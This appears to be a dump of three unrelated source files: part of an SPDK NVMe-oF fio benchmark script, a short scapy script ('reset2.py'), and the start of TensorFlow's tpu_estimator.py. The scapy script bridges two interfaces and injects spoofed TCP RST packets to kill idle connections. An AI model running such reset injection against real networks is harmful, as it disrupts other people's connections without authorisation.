fixedbufs=1
registerfiles=1
#hipri=1
"""
if num_jobs:
fio_config = fio_config + "numjobs=%s \n" % num_jobs
if self.cpus_allowed is not None:
fio_config = fio_config + "cpus_allowed=%s \n" % self.cpus_allowed
fio_config = fio_config + "cpus_allowed_policy=%s \n" % self.cpus_allowed_policy
fio_config = fio_config + filename_section
fio_config_filename = "%s_%s_%s_m_%s" % (block_size, io_depth, rw, rwmixread)
if hasattr(self, "num_cores"):
fio_config_filename += "_%sCPU" % self.num_cores
fio_config_filename += ".fio"
self.exec_cmd(["mkdir", "-p", "%s/nvmf_perf" % self.spdk_dir])
self.exec_cmd(["echo", "'%s'" % fio_config, ">", "%s/nvmf_perf/%s" % (self.spdk_dir, fio_config_filename)])
self.log_print("Created FIO Config:")
self.log_print(fio_config)
return os.path.join(self.spdk_dir, "nvmf_perf", fio_config_filename)
def set_cpu_frequency(self):
if self.cpu_frequency is not None:
try:
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-g", "userspace"], True)
self.exec_cmd(["sudo", "cpupower", "frequency-set", "-f", "%s" % self.cpu_frequency], True)
self.log_print(self.exec_cmd(["sudo", "cpupower", "frequency-info"]))
except Exception:
self.log_print("ERROR: cpu_frequency will not work when intel_pstate is enabled!")
sys.exit()
else:
self.log_print("WARNING: you have disabled intel_pstate and using default cpu governance.")
def run_fio(self, fio_config_file, run_num=None):
job_name, _ = os.path.splitext(fio_config_file)
self.log_print("Starting FIO run for job: %s" % job_name)
self.log_print("Using FIO: %s" % self.fio_bin)
if run_num:
for i in range(1, run_num + 1):
output_filename = job_name + "_run_" + str(i) + "_" + self.name + ".json"
try:
output = self.exec_cmd(["sudo", self.fio_bin, fio_config_file, "--output-format=json",
"--output=%s" % output_filename, "--eta=never"], True)
self.log_print(output)
except subprocess.CalledProcessError as e:
self.log_print("ERROR: Fio process failed!")
self.log_print(e.stdout)
else:
output_filename = job_name + "_" + self.name + ".json"
output = self.exec_cmd(["sudo", self.fio_bin,
fio_config_file, "--output-format=json",
"--output" % output_filename], True)
self.log_print(output)
self.log_print("FIO run finished. Results in: %s" % output_filename)
def sys_config(self):
self.log_print("====Kernel release:====")
self.log_print(self.exec_cmd(["uname", "-r"]))
self.log_print("====Kernel command line:====")
cmdline = self.exec_cmd(["cat", "/proc/cmdline"])
self.log_print('\n'.join(self.get_uncommented_lines(cmdline.splitlines())))
self.log_print("====sysctl conf:====")
sysctl = self.exec_cmd(["cat", "/etc/sysctl.conf"])
self.log_print('\n'.join(self.get_uncommented_lines(sysctl.splitlines())))
self.log_print("====Cpu power info:====")
self.log_print(self.exec_cmd(["cpupower", "frequency-info"]))
class KernelTarget(Target):
def __init__(self, name, general_config, target_config):
super(KernelTarget, self).__init__(name, general_config, target_config)
# Defaults
self.nvmet_bin = "nvmetcli"
if "nvmet_bin" in target_config:
self.nvmet_bin = target_config["nvmet_bin"]
def __del__(self):
nvmet_command(self.nvmet_bin, "clear")
def kernel_tgt_gen_subsystem_conf(self, nvme_list, address_list):
nvmet_cfg = {
"ports": [],
"hosts": [],
"subsystems": [],
}
# Split disks between NIC IP's
disks_per_ip = int(len(nvme_list) / len(address_list))
disk_chunks = [nvme_list[i * disks_per_ip:disks_per_ip + disks_per_ip * i] for i in range(0, len(address_list))]
subsys_no = 1
port_no = 0
for ip, chunk in zip(address_list, disk_chunks):
for disk in chunk:
nqn = "nqn.2018-09.io.spdk:cnode%s" % subsys_no
nvmet_cfg["subsystems"].append({
"allowed_hosts": [],
"attr": {
"allow_any_host": "1",
"serial": "SPDK00%s" % subsys_no,
"version": "1.3"
},
"namespaces": [
{
"device": {
"path": disk,
"uuid": "%s" % uuid.uuid4()
},
"enable": 1,
"nsid": subsys_no
}
],
"nqn": nqn
})
nvmet_cfg["ports"].append({
"addr": {
"adrfam": "ipv4",
"traddr": ip,
"trsvcid": "%s" % (4420 + port_no),
"trtype": "%s" % self.transport
},
"portid": subsys_no,
"referrals": [],
"subsystems": [nqn]
})
subsys_no += 1
port_no += 1
self.subsystem_info_list.append([port_no, nqn, ip])
with open("kernel.conf", "w") as fh:
fh.write(json.dumps(nvmet_cfg, indent=2))
pass
def tgt_start(self):
self.log_print("Configuring kernel NVMeOF Target")
if self.null_block:
print("Configuring with null block device.")
null_blk_list = ["/dev/nullb{}".format(x) for x in range(self.null_block)]
self.kernel_tgt_gen_subsystem_conf(null_blk_list, self.nic_ips)
self.subsys_no = len(null_blk_list)
else:
print("Configuring with NVMe drives.")
nvme_list = get_nvme_devices()
self.kernel_tgt_gen_subsystem_conf(nvme_list, self.nic_ips)
self.subsys_no = len(nvme_list)
nvmet_command(self.nvmet_bin, "clear")
nvmet_command(self.nvmet_bin, "restore kernel.conf")
if self.enable_adq:
self.adq_configure_tc()
self.log_print("Done configuring kernel NVMeOF Target")
class SPDKTarget(Target):
def __init__(self, name, general_config, target_config):
super(SPDKTarget, self).__init__(name, general_config, target_config)
# Required fields
self.core_mask = target_config["core_mask"]
self.num_cores = self.get_num_cores(self.core_mask)
# Defaults
self.dif_insert_strip = False
self.null_block_dif_type = 0
self.num_shared_buffers = 4096
self.bpf_proc = None
self.bpf_scripts = []
if "num_shared_buffers" in target_config:
self.num_shared_buffers = target_config["num_shared_buffers"]
if "null_block_dif_type" in target_config:
self.null_block_dif_type = target_config["null_block_dif_type"]
if "dif_insert_strip" in target_config:
self.dif_insert_strip = target_config["dif_insert_strip"]
if "bpf_scripts" in target_config:
self.bpf_scripts = target_config["bpf_scripts"]
def get_num_cores(self, core_mask):
if "0x" in core_mask:
return bin(int(core_mask, 16)).count("1")
else:
num_cores = 0
core_mask = core_mask.replace("[", "")
core_mask = core_mask.replace("]", "")
for i in core_mask.split(","):
if "-" in i:
x, y = i.split("-")
num_cores += len(range(int(x), int(y))) + 1
else:
num_cores += 1
return num_cores
def spdk_tgt_configure(self):
self.log_print("Configuring SPDK NVMeOF target via RPC")
# Create RDMA transport layer
rpc.nvmf.nvmf_create_transport(self.client, trtype=self.transport,
num_shared_buffers=self.num_shared_buffers,
dif_insert_or_strip=self.dif_insert_strip,
sock_priority=self.adq_priority)
self.log_print("SPDK NVMeOF transport layer:")
rpc.client.print_dict(rpc.nvmf.nvmf_get_transports(self.client))
if self.enable_adq:
self.adq_configure_tc()
self.log_print("Done configuring SPDK NVMeOF Target")
if self.null_block:
self.spdk_tgt_add_nullblock(self.null_block)
self.spdk_tgt_add_subsystem_conf(self.nic_ips, self.null_block)
else:
self.spdk_tgt_add_nvme_conf()
self.spdk_tgt_add_subsystem_conf(self.nic_ips)
def spdk_tgt_add_nullblock(self, null_block_count):
md_size = 0
block_size = 4096
if self.null_block_dif_type != 0:
md_size = 128
self.log_print("Adding null block bdevices to config via RPC")
for i in range(null_block_count):
self.log_print("Setting bdev protection to :%s" % self.null_block_dif_type)
rpc.bdev.bdev_null_create(self.client, 102400, block_size + md_size, "Nvme{}n1".format(i),
dif_type=self.null_block_dif_type, md_size=md_size)
self.log_print("SPDK Bdevs configuration:")
rpc.client.print_dict(rpc.bdev.bdev_get_bdevs(self.client))
def spdk_tgt_add_nvme_conf(self, req_num_disks=None):
self.log_print("Adding NVMe bdevs to config via RPC")
bdfs = get_nvme_devices_bdf()
bdfs = [b.replace(":", ".") for b in bdfs]
if req_num_disks:
if req_num_disks > len(bdfs):
self.log_print("ERROR: Requested number of disks is more than available %s" % len(bdfs))
sys.exit(1)
else:
bdfs = bdfs[0:req_num_disks]
for i, bdf in enumerate(bdfs):
rpc.bdev.bdev_nvme_attach_controller(self.client, name="Nvme%s" % i, trtype="PCIe", traddr=bdf)
self.log_print("SPDK Bdevs configuration:")
rpc.client.print_dict(rpc.bdev.bdev_get_bdevs(self.client))
def spdk_tgt_add_subsystem_conf(self, ips=None, req_num_disks=None):
self.log_print("Adding subsystems to config")
port = "4420"
if not req_num_disks:
req_num_disks = get_nvme_devices_count()
# Distribute bdevs between provided NICs
num_disks = range(0, req_num_disks)
if len(num_disks) == 1:
disks_per_ip = 1
else:
disks_per_ip = int(len(num_disks) / len(ips))
disk_chunks = [num_disks[i * disks_per_ip:disks_per_ip + disks_per_ip * i] for i in range(0, len(ips))]
# Create subsystems, add bdevs to namespaces, add listeners
for ip, chunk in zip(ips, disk_chunks):
for c in chunk:
nqn = "nqn.2018-09.io.spdk:cnode%s" % c
serial = "SPDK00%s" % c
bdev_name = "Nvme%sn1" % c
rpc.nvmf.nvmf_create_subsystem(self.client, nqn, serial,
allow_any_host=True, max_namespaces=8)
rpc.nvmf.nvmf_subsystem_add_ns(self.client, nqn, bdev_name)
rpc.nvmf.nvmf_subsystem_add_listener(self.client,
nqn=nqn,
trtype=self.transport,
traddr=ip,
trsvcid=port,
adrfam="ipv4")
self.subsystem_info_list.append([port, nqn, ip])
self.log_print("SPDK NVMeOF subsystem configuration:")
rpc.client.print_dict(rpc.nvmf.nvmf_get_subsystems(self.client))
def bpf_start(self):
self.log_print("Starting BPF Trace scripts: %s" % self.bpf_scripts)
bpf_script = os.path.join(self.spdk_dir, "scripts/bpftrace.sh")
bpf_traces = [os.path.join(self.spdk_dir, "scripts/bpf", trace) for trace in self.bpf_scripts]
results_path = os.path.join(self.results_dir, "bpf_traces.txt")
with open(self.pid, "r") as fh:
nvmf_pid = str(fh.readline())
cmd = [bpf_script, nvmf_pid, *bpf_traces]
self.log_print(cmd)
self.bpf_proc = subprocess.Popen(cmd, env={"BPF_OUTFILE": results_path})
def tgt_start(self):
if self.null_block:
self.subsys_no = 1
else:
self.subsys_no = get_nvme_devices_count()
self.log_print("Starting SPDK NVMeOF Target process")
nvmf_app_path = os.path.join(self.spdk_dir, "build/bin/nvmf_tgt")
proc = subprocess.Popen([nvmf_app_path, "--wait-for-rpc", "-m", self.core_mask])
self.pid = os.path.join(self.spdk_dir, "nvmf.pid")
with open(self.pid, "w") as fh:
fh.write(str(proc.pid))
self.nvmf_proc = proc
self.log_print("SPDK NVMeOF Target PID=%s" % self.pid)
self.log_print("Waiting for spdk to initilize...")
while True:
if os.path.exists("/var/tmp/spdk.sock"):
break
time.sleep(1)
self.client = rpc.client.JSONRPCClient("/var/tmp/spdk.sock")
if self.enable_zcopy:
rpc.sock.sock_impl_set_options(self.client, impl_name="posix",
enable_zerocopy_send_server=True)
self.log_print("Target socket options:")
rpc.client.print_dict(rpc.sock.sock_impl_get_options(self.client, impl_name="posix"))
if self.enable_adq:
rpc.sock.sock_impl_set_options(self.client, impl_name="posix", enable_placement_id=1)
rpc.bdev.bdev_nvme_set_options(self.client, timeout_us=0, action_on_timeout=None,
nvme_adminq_poll_period_us=100000, retry_count=4)
rpc.nvmf.nvmf_set_config(self.client, acceptor_poll_rate=10000)
rpc.app.framework_set_scheduler(self.client, name=self.scheduler_name)
rpc.framework_start_init(self.client)
if self.bpf_scripts:
self.bpf_start()
self.spdk_tgt_configure()
def __del__(self):
if self.bpf_proc:
self.log_print("Stopping BPF Trace script")
self.bpf_proc.terminate()
self.bpf_proc.wait()
if hasattr(self, "nvmf_proc"):
try:
self.nvmf_proc.terminate()
self.nvmf_proc.wait()
except Exception as e:
self.log_print(e)
self.nvmf_proc.kill()
self.nvmf_proc.communicate()
class KernelInitiator(Initiator):
def __init__(self, name, general_config, initiator_config):
super(KernelInitiator, self).__init__(name, general_config, initiator_config)
# Defaults
self.extra_params = ""
self.ioengine = "libaio"
if "extra_params" in initiator_config:
self.extra_params = initiator_config["extra_params"]
if "kernel_engine" in initiator_config:
self.ioengine = initiator_config["kernel_engine"]
if "io_uring" in self.ioengine:
self.extra_params = "--nr-poll-queues=8"
def __del__(self):
self.ssh_connection.close()
def get_connected_nvme_list(self):
json_obj = json.loads(self.exec_cmd(["sudo", "nvme", "list", "-o", "json"]))
nvme_list = [os.path.basename(x["DevicePath"]) for x in json_obj["Devices"]
if "SPDK" in x["ModelNumber"] or "Linux" in x["ModelNumber"]]
return nvme_list
def kernel_init_connect(self):
self.log_print("Below connection attempts may result in error messages, this is expected!")
for subsystem in self.subsystem_info_list:
self.log_print("Trying to connect %s %s %s" % subsystem)
self.exec_cmd(["sudo", self.nvmecli_bin, "connect", "-t", self.transport,
"-s", subsystem[0], "-n", subsystem[1], "-a", subsystem[2], self.extra_params])
time.sleep(2)
if "io_uring" in self.ioengine:
self.log_print("Setting block layer settings for io_uring.")
# TODO: io_poll=1 and io_poll_delay=-1 params not set here, because
# apparently it's not possible for connected subsystems.
# Results in "error: Invalid argument"
block_sysfs_settings = {
"iostats": "0",
"rq_affinity": "0",
"nomerges": "2"
}
for disk in self.get_connected_nvme_list():
sysfs = os.path.join("/sys/block", disk, "queue")
for k, v in block_sysfs_settings.items():
sysfs_opt_path = os.path.join(sysfs, k)
try:
self.exec_cmd(["sudo", "bash", "-c", "echo %s > %s" % (v, sysfs_opt_path)], stderr_redirect=True)
except subprocess.CalledProcessError as e:
self.log_print("Warning: command %s failed due to error %s. %s was not set!" % (e.cmd, e.output, v))
finally:
_ = self.exec_cmd(["sudo", "cat", "%s" % (sysfs_opt_path)])
self.log_print("%s=%s" % (sysfs_opt_path, _))
def kernel_init_disconnect(self):
for subsystem in self.subsystem_info_list:
self.exec_cmd(["sudo", self.nvmecli_bin, "disconnect", "-n", subsystem[1]])
time.sleep(1)
def gen_fio_filename_conf(self, threads, io_depth, num_jobs=1):
nvme_list = [os.path.join("/dev", nvme) for nvme in self.get_connected_nvme_list()]
filename_section = ""
nvme_per_split = int(len(nvme_list) / len(threads))
remainder = len(nvme_list) % len(threads)
iterator = iter(nvme_list)
result = []
for i in range(len(threads)):
result.append([])
for _ in range(nvme_per_split):
result[i].append(next(iterator))
if remainder:
result[i].append(next(iterator))
remainder -= 1
for i, r in enumerate(result):
header = "[filename%s]" % i
disks = "\n".join(["filename=%s" % x for x in r])
job_section_qd = round((io_depth * len(r)) / num_jobs)
if job_section_qd == 0:
job_section_qd = 1
iodepth = "iodepth=%s" % job_section_qd
filename_section = "\n".join([filename_section, header, disks, iodepth])
return filename_section
class SPDKInitiator(Initiator):
def __init__(self, name, general_config, initiator_config):
super(SPDKInitiator, self).__init__(name, general_config, initiator_config)
if "skip_spdk_install" not in general_config or general_config["skip_spdk_install"] is False:
self.install_spdk()
# Required fields
self.num_cores = initiator_config["num_cores"]
def install_spdk(self):
self.log_print("Using fio binary %s" % self.fio_bin)
self.exec_cmd(["git", "-C", self.spdk_dir, "submodule", "update", "--init"])
self.exec_cmd(["git", "-C", self.spdk_dir, "clean", "-ffdx"])
self.exec_cmd(["cd", self.spdk_dir, "&&", "./configure", "--with-rdma", "--with-fio=%s" % os.path.dirname(self.fio_bin)])
self.exec_cmd(["make", "-C", self.spdk_dir, "clean"])
self.exec_cmd(["make", "-C", self.spdk_dir, "-j$(($(nproc)*2))"])
self.log_print("SPDK built")
self.exec_cmd(["sudo", "%s/scripts/setup.sh" % self.spdk_dir])
def gen_spdk_bdev_conf(self, remote_subsystem_list):
bdev_cfg_section = {
"subsystems": [
{
"subsystem": "bdev",
"config": []
}
]
}
for i, subsys in enumerate(remote_subsystem_list):
sub_port, sub_nqn, sub_addr = map(lambda x: str(x), subsys)
nvme_ctrl = {
"method": "bdev_nvme_attach_controller",
"params": {
"name": "Nvme{}".format(i),
"trtype": self.transport,
"traddr": sub_addr,
"trsvcid": sub_port,
"subnqn": sub_nqn,
"adrfam": "IPv4"
}
}
if self.enable_adq:
nvme_ctrl["params"].update({"priority": "1"})
bdev_cfg_section["subsystems"][0]["config"].append(nvme_ctrl)
return json.dumps(bdev_cfg_section, indent=2)
def gen_fio_filename_conf(self, subsystems, threads, io_depth, num_jobs=1):
filename_section = ""
if len(threads) >= len(subsystems):
threads = range(0, len(subsystems))
filenames = ["Nvme%sn1" % x for x in range(0, len(subsystems))]
nvme_per_split = int(len(subsystems) / len(threads))
remainder = len(subsystems) % len(threads)
iterator = iter(filenames)
result = []
for i in range(len(threads)):
result.append([])
for _ in range(nvme_per_split):
result[i].append(next(iterator))
if remainder:
result[i].append(next(iterator))
remainder -= 1
for i, r in enumerate(result):
header = "[filename%s]" % i
disks = "\n".join(["filename=%s" % x for x in r])
job_section_qd = round((io_depth * len(r)) / num_jobs)
if job_section_qd == 0:
job_section_qd = 1
iodepth = "iodepth=%s" % job_section_qd
filename_section = "\n".join([filename_section, header, disks, iodepth])
return filename_section
if __name__ == "__main__":
script_full_dir = os.path.dirname(os.path.realpath(__file__))
default_config_file_path = os.path.relpath(os.path.join(script_full_dir, "config.json"))
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-c', '--config', type=str, default=default_config_file_path,
help='Configuration file.')
parser.add_argument('-r', '--results', type=str, default='/tmp/results',
help='Results directory.')
parser.add_argument('-s', '--csv-filename', type=str, default='nvmf_results.csv',
help='CSV results filename.')
args = parser.parse_args()
print("Using config file: %s" % args.config)
with open(args.config, "r") as config:
data = json.load(config)
initiators = []
fio_cases = []
general_config = data["general"]
target_config = data["target"]
initiator_configs = [data[x] for x in data.keys() if "initiator" in x]
for k, v in data.items():
if "target" in k:
v.update({"results_dir": args.results})
if data[k]["mode"] == "spdk":
target_obj = SPDKTarget(k, data["general"], v)
elif data[k]["mode"] == "kernel":
target_obj = KernelTarget(k, data["general"], v)
pass
elif "initiator" in k:
if data[k]["mode"] == "spdk":
init_obj = SPDKInitiator(k, data["general"], v)
elif data[k]["mode"] == "kernel":
init_obj = KernelInitiator(k, data["general"], v)
initiators.append(init_obj)
elif "fio" in k:
fio_workloads = itertools.product(data[k]["bs"],
data[k]["qd"],
data[k]["rw"])
fio_run_time = data[k]["run_time"]
fio_ramp_time = data[k]["ramp_time"]
fio_rw_mix_read = data[k]["rwmixread"]
fio_run_num = data[k]["run_num"] if "run_num" in data[k].keys() else None
fio_num_jobs = data[k]["num_jobs"] if "num_jobs" in data[k].keys() else None
fio_rate_iops = 0
if "rate_iops" in data[k]:
fio_rate_iops = data[k]["rate_iops"]
else:
continue
try:
os.mkdir(args.results)
except FileExistsError:
pass
target_obj.tgt_start()
for i in initiators:
i.discover_subsystems(i.target_nic_ips, target_obj.subsys_no)
if i.enable_adq:
i.adq_configure_tc()
# Poor mans threading
# Run FIO tests
for block_size, io_depth, rw in fio_workloads:
threads = []
configs = []
for i in initiators:
if i.mode == "kernel":
i.kernel_init_connect()
cfg = i.gen_fio_config(rw, fio_rw_mix_read, block_size, io_depth, target_obj.subsys_no,
fio_num_jobs, fio_ramp_time, fio_run_time, fio_rate_iops)
configs.append(cfg)
for i, cfg in zip(initiators, configs):
t = threading.Thread(target=i.run_fio, args=(cfg, fio_run_num))
threads.append(t)
if target_obj.enable_sar:
sar_file_name = "_".join([str(block_size), str(rw), str(io_depth), "sar"])
sar_file_name = ".".join([sar_file_name, "txt"])
t = threading.Thread(target=target_obj.measure_sar, args=(args.results, sar_file_name))
threads.append(t)
if target_obj.enable_pcm:
pcm_fnames = ["%s_%s_%s_%s.csv" % (block_size, rw, io_depth, x) for x in ["pcm_cpu", "pcm_memory", "pcm_power"]]
pcm_cpu_t = threading.Thread(target=target_obj.measure_pcm, args=(args.results, pcm_fnames[0],))
pcm_mem_t = threading.Thread(target=target_obj.measure_pcm_memory, args=(args.results, pcm_fnames[1],))
pcm_pow_t = threading.Thread(target=target_obj.measure_pcm_power, args=(args.results, pcm_fnames[2],))
threads.append(pcm_cpu_t)
threads.append(pcm_mem_t)
threads.append(pcm_pow_t)
if target_obj.enable_bandwidth:
bandwidth_file_name = "_".join(["bandwidth", str(block_size), str(rw), str(io_depth)])
bandwidth_file_name = ".".join([bandwidth_file_name, "csv"])
t = threading.Thread(target=target_obj.measure_network_bandwidth, args=(args.results, bandwidth_file_name,))
threads.append(t)
if target_obj.enable_dpdk_memory:
t = threading.Thread(target=target_obj.measure_dpdk_memory, args=(args.results))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for i in initiators:
if i.mode == "kernel":
i.kernel_init_disconnect()
i.copy_result_files(args.results)
target_obj.restore_governor()
target_obj.restore_tuned()
target_obj.restore_services()
target_obj.restore_sysctl()
for i in initiators:
i.restore_governor()
i.restore_tuned()
i.restore_services()
i.restore_sysctl()
target_obj.parse_results(args.results, args.csv_filename)
|
reset2.py
|
#!/usr/bin/env python
from scapy.all import *
import argparse
import time
import threading
timer1=0.0
timer2=0.0
timer1_set=False
timer2_set=False
tcpData1={}
tcpData2={}
def watchdog():
global timer1_set
global timer2_set
global timer1
global timer2
global tcpData1
global tcpData2
print("Thread started")
#while timer1_set:
while True:
print("checking time")
if (time.time()-timer1)>10:
# send RST
print("sending RST")
p=IP(src=tcpData1['dst'], dst=tcpData1['src'])/TCP(sport=tcpData1['dport'], dport=tcpData1['sport'], flags="R", seq=tcpData1['ack'])
send(p, iface=args.in_interface)
'''
while timer2_set:
if (time.time()-timer2)>10:
# send RST
print("sending RST")
p=IP(src=tcpData2['dst'], dst=tcpData2['src'])/TCP(sport=tcpData2['dport'], dport=tcpData2['sport'], flags="R", seq=tcpData2['ack'])
send(p, iface=args.out_interface)
'''
def packet_callback(packet):
'''
Return True then packet is forwarded, return False then packet is dropped,
return packet then that packet is forwarded
'''
if True:
return True
else:
return False
def packet_callback12(packet):
global timer1_set
timer1_set=True
global tcpData1
if packet.haslayer(TCP):
tcpData1={'src':packet[IP].src,'dst':packet[IP].dst,'sport':packet[TCP].sport,
'dport':packet[TCP].dport,'seq':packet[TCP].seq,'ack':packet[TCP].ack}
global timer1
timer1=time.time()
print("Timer 1 = "+ str(timer1))
return True
def packet_callback21(packet):
global timer2_set
timer2_set=True
global tcpData2
if packet.haslayer(TCP):
tcpData2={'src':packet[IP].src,'dst':packet[IP].dst,'sport':packet[TCP].sport,
'dport':packet[TCP].dport,'seq':packet[TCP].seq,'ack':packet[TCP].ack}
global timer2
timer2=time.time()
print("Timer2: "+str(timer2))
return True
def main():
parser=argparse.ArgumentParser()
parser.add_argument('--in_interface', '-i', required=True, type=str)
parser.add_argument('--out_interface', '-o', required=True, type=str)
args=parser.parse_args()
t=threading.Thread(target=watchdog)
t.start()
while True:
#bridge_and_sniff(args.in_interface, args.out_interface, prn=packet_callback)
bridge_and_sniff(args.in_interface, args.out_interface, xfrm12=packet_callback12, xfrm21=packet_callback21)
if __name__=='__main__':
main()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import tensorflow as tf
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE = 1
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP = 5
_TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY = '_concatenated_small_features'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
if ops.get_to_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Please use tf.contrib.summary instead of tf.summary '
'inside of host_calls.')
def _create_global_step(graph):
graph = graph or tf.compat.v1.get_default_graph()
if tf.compat.v1.train.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return tf.compat.v1.get_variable(
tf.compat.v1.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=tf.dtypes.int64,
initializer=tf.compat.v1.initializers.zeros(),
trainable=False,
use_resource=True,
collections=[tf.compat.v1.GraphKeys.GLOBAL_VARIABLES, tf.compat.v1.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather then a constant, is to allow
TPUEstimator adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = tf.compat.v1.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
